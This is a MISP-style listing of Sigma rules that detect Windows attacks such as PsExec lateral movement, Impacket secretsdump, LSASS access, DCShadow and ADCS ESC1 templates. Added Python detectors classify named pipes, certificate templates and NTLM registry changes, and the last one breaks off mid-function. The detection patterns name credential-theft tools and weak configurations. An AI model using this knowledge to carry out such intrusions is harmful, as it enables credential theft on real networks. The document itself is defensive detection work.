  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8986. Table References

Links

https://awakesecurity.com/blog/threat-hunting-for-paexec/

https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf

https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_service_installs.yml

Impacket PsExec Execution

Detects execution of Impacket’s psexec.py.

The tag is: misp-galaxy:sigma-rules="Impacket PsExec Execution"

Impacket PsExec Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8987. Table References

Links

https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_psexec.yml

Remote Service Activity via SVCCTL Named Pipe

Detects remote service activity via remote access to the svcctl named pipe

The tag is: misp-galaxy:sigma-rules="Remote Service Activity via SVCCTL Named Pipe"

Remote Service Activity via SVCCTL Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8988. Table References

Links

https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_svcctl_remote_service.yml

Windows Event Auditing Disabled

Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways.

The tag is: misp-galaxy:sigma-rules="Windows Event Auditing Disabled"

Windows Event Auditing Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 8989. Table References

Links

https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_disable_event_auditing.yml

Invoke-Obfuscation Via Use Rundll32 - Security

Detects obfuscated PowerShell via use of Rundll32 in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - Security"

Invoke-Obfuscation Via Use Rundll32 - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8990. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml

User Logoff Event

Detects user log-off activity. Can be used, for example, to correlate information during forensic investigations.

The tag is: misp-galaxy:sigma-rules="User Logoff Event"

User Logoff Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531" with estimative-language:likelihood-probability="almost-certain"

Table 8991. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647

https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml

Access To ADMIN$ Network Share

Detects access to ADMIN$ network share

The tag is: misp-galaxy:sigma-rules="Access To ADMIN$ Network Share"

Access To ADMIN$ Network Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8992. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5140

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml

Secure Deletion with SDelete

Detects the renaming of a file during deletion with the SDelete tool.

The tag is: misp-galaxy:sigma-rules="Secure Deletion with SDelete"

Secure Deletion with SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"

Table 8993. Table References

Links

https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete

https://www.jpcert.or.jp/english/pub/sr/ir_research.html

https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml

ADCS Certificate Template Configuration Vulnerability

Detects certificate creation using a template whose configuration grants risky permissions to the subject.

The tag is: misp-galaxy:sigma-rules="ADCS Certificate Template Configuration Vulnerability"

Table 8994. Table References

Links

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml

Register new Logon Process by Rubeus

Detects potential use of Rubeus via the registration of a new trusted logon process.

The tag is: misp-galaxy:sigma-rules="Register new Logon Process by Rubeus"

Register new Logon Process by Rubeus has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

Table 8995. Table References

Links

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml

DCERPC SMB Spoolss Named Pipe

Detects the use of the spoolss named pipe over SMB. This can be used to coerce NTLM authentication from any machine that has the Print Spooler service enabled.

The tag is: misp-galaxy:sigma-rules="DCERPC SMB Spoolss Named Pipe"

DCERPC SMB Spoolss Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 8996. Table References

Links

https://dirkjanm.io/a-different-way-of-abusing-zerologon/

https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1

https://twitter.com/_dirkjan/status/1309214379003588608

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml

Invoke-Obfuscation Via Stdin - Security

Detects obfuscated PowerShell via Stdin in scripts.

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - Security"

Invoke-Obfuscation Via Stdin - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 8997. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml

Metasploit Or Impacket Service Installation Via SMB PsExec

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

The tag is: misp-galaxy:sigma-rules="Metasploit Or Impacket Service Installation Via SMB PsExec"

Metasploit Or Impacket Service Installation Via SMB PsExec has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 8998. Table References

Links

https://bczyz1.github.io/2021/01/30/psexec.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml

AD Object WriteDAC Access

Detects WRITE_DAC access to a domain object

The tag is: misp-galaxy:sigma-rules="AD Object WriteDAC Access"

AD Object WriteDAC Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

Table 8999. Table References

Links

https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html

https://threathunterplaybook.com/library/windows/active_directory_replication.html

https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml

Kerberos Manipulation

Detects a failed Kerberos TGT issuance operation. This can be a sign of manipulation of TGT messages by an attacker.

The tag is: misp-galaxy:sigma-rules="Kerberos Manipulation"

Kerberos Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

Table 9000. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4771

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml

First Time Seen Remote Named Pipe

This detection excludes known named pipes that are accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes.

The tag is: misp-galaxy:sigma-rules="First Time Seen Remote Named Pipe"

First Time Seen Remote Named Pipe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9001. Table References

Links

https://twitter.com/menasec1/status/1104489274387451904

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml
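Several of the entries above (Suspicious PsExec Execution, Impacket PsExec Execution, Remote Service Activity via SVCCTL Named Pipe, DCERPC SMB Spoolss Named Pipe, and this First Time Seen Remote Named Pipe rule) are all read from the same source: Security event 5145 on the IPC$ share, where RelativeTargetName is the named pipe being opened remotely. The classifier below is an added example that serves all of them and is not code from the Sigma project or from MISP. Event 5145 and its fields (ShareName, RelativeTargetName, IpAddress, SubjectUserName) are real; the PsExec stream naming ("<service>-<client host>-<pid>-stdin/stdout/stderr", service name PSEXESVC by default) and the Impacket RemCom pipe names are stated from knowledge of those tools rather than from the page; the baseline of known pipes and the sample records are constructed.

```python
"""Classifying Security 5145 events on \\*\IPC$ by the named pipe they open,
covering renamed PsExec, Impacket psexec.py, service control and spooler
pipes, and a first-time-seen baseline for everything else (added example)."""
import re
from typing import List, Optional, Set, Tuple

# Pipes Windows itself opens remotely all day (constructed baseline; a real
# exclusion list is longer and site-specific).
BASELINE_PIPES = {"samr", "lsarpc", "netlogon", "srvsvc", "wkssvc",
                  "winreg", "atsvc", "eventlog", "browser", "netdfs"}

# Normal pipes that nevertheless mean someone is driving services or the
# spooler remotely; reported under their own rule titles.
SERVICE_PIPES = {
    "svcctl": "Remote Service Activity via SVCCTL Named Pipe",
    "spoolss": "DCERPC SMB Spoolss Named Pipe",
}

# Sysinternals PsExec streams: "<service>-<client host>-<pid>-stdin|stdout|stderr".
# A service prefix other than PSEXESVC means PsExec was renamed or a clone
# mimicking its protocol is in use (assumption drawn from the tool's behaviour).
PSEXEC_STREAM = re.compile(
    r"^(?P<svc>[^-]+)-(?P<host>.+)-(?P<pid>\d+)-(?:stdin|stdout|stderr)$", re.I)
# Impacket psexec.py talks to its RemComSvc over these pipes (sic: "communicaton").
IMPACKET_PIPE = re.compile(r"^RemCom_(?:communicaton|stdin|stdout|stderr)", re.I)


def classify(event: dict, seen: Set[str]) -> Optional[Tuple[str, str]]:
    """Return (rule title, pipe) when the access is worth reporting, else None.
    `seen` carries the first-time-seen state between calls."""
    if event.get("EventID") != 5145:
        return None
    if not event.get("ShareName", "").upper().endswith("\\IPC$"):
        return None
    pipe = event.get("RelativeTargetName", "")
    key = pipe.lower()
    if IMPACKET_PIPE.match(pipe):
        return ("Impacket PsExec Execution", pipe)
    m = PSEXEC_STREAM.match(pipe)
    if m:
        if m.group("svc").upper() == "PSEXESVC":
            return ("PsExec Execution (default service name)", pipe)
        return ("Suspicious PsExec Execution", pipe)
    if key in SERVICE_PIPES:
        return (SERVICE_PIPES[key], pipe)
    if key in BASELINE_PIPES or key in seen:
        return None
    seen.add(key)
    return ("First Time Seen Remote Named Pipe", pipe)


def classify_all(events) -> List[dict]:
    seen: Set[str] = set()
    out: List[dict] = []
    for ev in events:
        hit = classify(ev, seen)
        if hit:
            out.append({"rule": hit[0], "pipe": hit[1],
                        "source": ev.get("IpAddress", ""),
                        "user": ev.get("SubjectUserName", "")})
    return out


IPC = "\\\\*\\IPC$"
SAMPLE_EVENTS = [  # constructed records
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "samr", "IpAddress": "10.0.0.5", "SubjectUserName": "alice"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "PSEXESVC-WS-01-1234-stdin", "IpAddress": "10.0.0.7", "SubjectUserName": "admin"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "svcupdate-WS-01-4321-stdout", "IpAddress": "10.0.0.7", "SubjectUserName": "admin"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "RemCom_communicaton", "IpAddress": "10.0.0.9", "SubjectUserName": "bob"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "svcctl", "IpAddress": "10.0.0.9", "SubjectUserName": "bob"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "spoolss", "IpAddress": "10.0.0.11", "SubjectUserName": "SRV01$"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "msagent_4f", "IpAddress": "10.0.0.13", "SubjectUserName": "carol"},
    {"EventID": 5145, "ShareName": IPC, "RelativeTargetName": "msagent_4f", "IpAddress": "10.0.0.13", "SubjectUserName": "carol"},
    {"EventID": 5145, "ShareName": "\\\\*\\C$", "RelativeTargetName": "Windows\\Temp\\x.exe", "IpAddress": "10.0.0.13", "SubjectUserName": "carol"},
]

if __name__ == "__main__":
    for hit in classify_all(SAMPLE_EVENTS):
        print(f"{hit['rule']}: {hit['pipe']} from {hit['source']} as {hit['user']}")
```

Ordering matters: tool-specific patterns are tested before the generic first-seen logic so that a renamed PsExec pipe is never silently absorbed into the baseline on its first appearance, and the baseline set is the state you would persist between runs in a real deployment.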

Invoke-Obfuscation Obfuscated IEX Invocation - Security

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - Security"

Invoke-Obfuscation Obfuscated IEX Invocation - Security has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9002. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml

Transferring Files with Credential Data via Network Shares

Detects the transfer of files with well-known filenames (sensitive files containing credential data) over network shares.

The tag is: misp-galaxy:sigma-rules="Transferring Files with Credential Data via Network Shares"

Transferring Files with Credential Data via Network Shares has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9003. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml

Remote PowerShell Sessions Network Connections (WinRM)

Detects basic PowerShell Remoting (WinRM) by monitoring for inbound network connections to ports 5985 or 5986.

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Sessions Network Connections (WinRM)"

Remote PowerShell Sessions Network Connections (WinRM) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9004. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml

Suspicious LDAP-Attributes Used

Detects the usage of particular AttributeLDAPDisplayNames which are known to be used for data exchange over LDAP by the tool LDAPFragger and which are otherwise not commonly used in companies.

The tag is: misp-galaxy:sigma-rules="Suspicious LDAP-Attributes Used"

Suspicious LDAP-Attributes Used has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

Table 9005. Table References

Links

https://github.com/fox-it/LDAPFragger

https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml

LSASS Access From Non System Account

Detects potential mimikatz-like tools accessing LSASS from a non-system account.

The tag is: misp-galaxy:sigma-rules="LSASS Access From Non System Account"

LSASS Access From Non System Account has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9006. Table References

Links

https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml

Possible Impacket SecretDump Remote Activity

Detects AD credential dumping using the Impacket secretsdump hacktool (HKTL).

The tag is: misp-galaxy:sigma-rules="Possible Impacket SecretDump Remote Activity"

Possible Impacket SecretDump Remote Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9007. Table References

Links

https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml

ADCS Certificate Template Configuration Vulnerability with Risky EKU

Detects the creation of a certificate template that combines a risky subject permission (the enrollee may supply the subject) with a risky EKU.

The tag is: misp-galaxy:sigma-rules="ADCS Certificate Template Configuration Vulnerability with Risky EKU"

Table 9008. Table References

Links

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml
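The combination the rule above looks for is the ESC1 pattern from the Certified Pre-Owned paper: the enrollee controls the subject and the template's EKU allows authentication, with nothing (manager approval, authorized signatures) compensating. The following is an added example, not the Sigma rule and not MISP code: it rebuilds template attributes from constructed 5136 directory-change events (one attribute value per event) and applies that check. The flag bits and EKU OIDs are the documented ones; the sample events, the field names used for grouping, and the absence of an enrollment-permission check (the other ESC1 precondition, which needs the template's ACL) are assumptions of the example.

```python
from typing import Dict, Iterable, List

# msPKI-Certificate-Name-Flag bit: the requester writes the subject / SAN themselves.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag bit: requests are pended for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that make an issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}


def u32(value) -> int:
    # AD stores these flags as signed 32-bit integers and 5136 renders them as
    # decimal strings; normalise to an unsigned bit mask.
    return int(str(value), 0) & 0xFFFFFFFF


def assess_template(attrs: dict) -> dict:
    """ESC1 check: subject supplied by enrollee + authentication EKU, with no
    manager approval and no authorized-signature requirement to compensate."""
    name_flag = u32(attrs.get("msPKI-Certificate-Name-Flag", 0))
    enroll_flag = u32(attrs.get("msPKI-Enrollment-Flag", 0))
    ra_signatures = int(attrs.get("msPKI-RA-Signature", 0))
    ekus = list(attrs.get("pKIExtendedKeyUsage", []))

    risky_ekus = [AUTH_EKUS[oid] for oid in ekus if oid in AUTH_EKUS]
    if not ekus:
        risky_ekus.append("no EKU (certificate usable for any purpose)")
    supplies_subject = bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    manager_approval = bool(enroll_flag & CT_FLAG_PEND_ALL_REQUESTS)

    reasons: List[str] = []
    if supplies_subject:
        reasons.append("enrollee supplies subject (CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)")
    if risky_ekus:
        reasons.append("authentication EKU: " + ", ".join(risky_ekus))
    esc1 = supplies_subject and bool(risky_ekus) and not manager_approval and ra_signatures == 0
    return {
        "template": attrs.get("cn"),
        "esc1": esc1,
        "manager_approval": manager_approval,
        "authorized_signatures": ra_signatures,
        "reasons": reasons,
    }


def templates_from_5136(events: Iterable[dict]) -> Dict[str, dict]:
    """Group directory-service-change events by ObjectDN into attribute dicts.
    Each 5136 event carries one attribute value, so multi-valued attributes
    such as pKIExtendedKeyUsage arrive as several events."""
    templates: Dict[str, dict] = {}
    for e in events:
        if e.get("EventID") != 5136 or e.get("ObjectClass") != "pKICertificateTemplate":
            continue
        dn = e["ObjectDN"]
        attrs = templates.setdefault(dn, {"cn": dn.split(",")[0][3:]})
        name, value = e["AttributeLDAPDisplayName"], e["AttributeValue"]
        if name == "pKIExtendedKeyUsage":
            attrs.setdefault(name, []).append(value)
        else:
            attrs[name] = value
    return templates


def assess_all(events: Iterable[dict]) -> Dict[str, dict]:
    return {t["cn"]: assess_template(t) for t in templates_from_5136(events).values()}


# Constructed sample 5136 events (not real telemetry).
_SUFFIX = ",CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=corp,DC=local"

def _ev(cn, attr, value):
    return {"EventID": 5136, "ObjectClass": "pKICertificateTemplate",
            "ObjectDN": f"CN={cn}{_SUFFIX}", "AttributeLDAPDisplayName": attr,
            "AttributeValue": value, "SubjectUserName": "pkiadmin"}

SAMPLE_EVENTS = [
    # ESC1: enrollee supplies subject, client-auth EKU, no approval, no signatures
    _ev("VulnUser", "msPKI-Certificate-Name-Flag", "1"),
    _ev("VulnUser", "msPKI-Enrollment-Flag", "0"),
    _ev("VulnUser", "msPKI-RA-Signature", "0"),
    _ev("VulnUser", "pKIExtendedKeyUsage", "1.3.6.1.5.5.7.3.2"),
    # Same shape, but manager approval is required: not ESC1
    _ev("ManagedUser", "msPKI-Certificate-Name-Flag", "1"),
    _ev("ManagedUser", "msPKI-Enrollment-Flag", "2"),
    _ev("ManagedUser", "msPKI-RA-Signature", "0"),
    _ev("ManagedUser", "pKIExtendedKeyUsage", "1.3.6.1.5.5.7.3.2"),
    # Subject supplied by enrollee, but only a Server Authentication EKU
    _ev("WebServer", "msPKI-Certificate-Name-Flag", "1"),
    _ev("WebServer", "msPKI-Enrollment-Flag", "0"),
    _ev("WebServer", "msPKI-RA-Signature", "0"),
    _ev("WebServer", "pKIExtendedKeyUsage", "1.3.6.1.5.5.7.3.1"),
]

if __name__ == "__main__":
    for cn, verdict in assess_all(SAMPLE_EVENTS).items():
        print(cn, verdict)
```

Auditing 5136 on the Certificate Templates container requires a SACL on that container in the Configuration partition; without it the events never fire, however good the rule is.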

Possible DC Shadow Attack

Detects DCShadow via the creation of a new SPN.

The tag is: misp-galaxy:sigma-rules="Possible DC Shadow Attack"

Possible DC Shadow Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rogue Domain Controller - T1207" with estimative-language:likelihood-probability="almost-certain"

Table 9009. Table References

Links

https://blog.alsid.eu/dcshadow-explained-4510f52fc19d

https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2

https://twitter.com/gentilkiwi/status/1003236624925413376

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml

Windows Defender Exclusion Deleted

Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to cover their tracks by removing previously added exclusions.

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusion Deleted"

Windows Defender Exclusion Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9010. Table References

Links

https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_windows_defender_exclusions_write_deleted.yml

DPAPI Domain Backup Key Extraction

Detects tools extracting the LSA secret DPAPI domain backup key from Domain Controllers.

The tag is: misp-galaxy:sigma-rules="DPAPI Domain Backup Key Extraction"

DPAPI Domain Backup Key Extraction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 9011. Table References

Links

https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml

T1047 Wmiprvse Wbemcomn DLL Hijack

Detects a threat actor creating a file named wbemcomn.dll in the C:\Windows\System32\wbem\ directory over the network for a WMI DLL Hijack scenario.

The tag is: misp-galaxy:sigma-rules="T1047 Wmiprvse Wbemcomn DLL Hijack"

T1047 Wmiprvse Wbemcomn DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 9012. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml

Unauthorized System Time Modification

Detects scenarios where a potentially unauthorized application or user is modifying the system time.

The tag is: misp-galaxy:sigma-rules="Unauthorized System Time Modification"

Unauthorized System Time Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

Table 9013. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616

Live environment caused by malware

Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml

NetNTLM Downgrade Attack

Detects a NetNTLM downgrade attack, in which the LSA registry values that control NTLM negotiation are modified so that the client falls back to weaker authentication.

The tag is: misp-galaxy:sigma-rules="NetNTLM Downgrade Attack"

NetNTLM Downgrade Attack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9014. Table References

Links

https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml
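The rule above keys on registry writes, but a practitioner also wants to know whether a given write was actually a downgrade or a hardening change. The following is an added example, not the Sigma rule and not MISP code: it filters constructed Security event 4657 records for the three LSA values the Optiv technique touches and classifies the new value. The flag bits for NtlmMinClientSec are the documented NTLMSSP negotiate flags; the sample events and the decimal-string rendering of DWORD data are assumptions of the example.

```python
from typing import Iterable, List, Optional

LSA_KEY = "\\REGISTRY\\MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa"
# Values the downgrade technique touches (compared case-insensitively).
WATCHED_VALUES = {"lmcompatibilitylevel", "ntlmminclientsec", "restrictsendingntlmtraffic"}

# NtlmMinClientSec is a mask of NTLMSSP negotiate flags; the hardened setting
# 0x20080000 requires both of these.
NTLMV2_SESSION_SECURITY = 0x00080000
KEY_128_BIT = 0x20000000


def parse_dword(raw) -> int:
    # 4657 renders DWORD data as a string; accept decimal or 0x-prefixed hex (assumption).
    return int(str(raw).strip(), 0)


def downgrade_reasons(value_name: str, new_value: int) -> List[str]:
    """Explain why the new value weakens NTLM; an empty list means no downgrade."""
    name = value_name.lower()
    reasons = []
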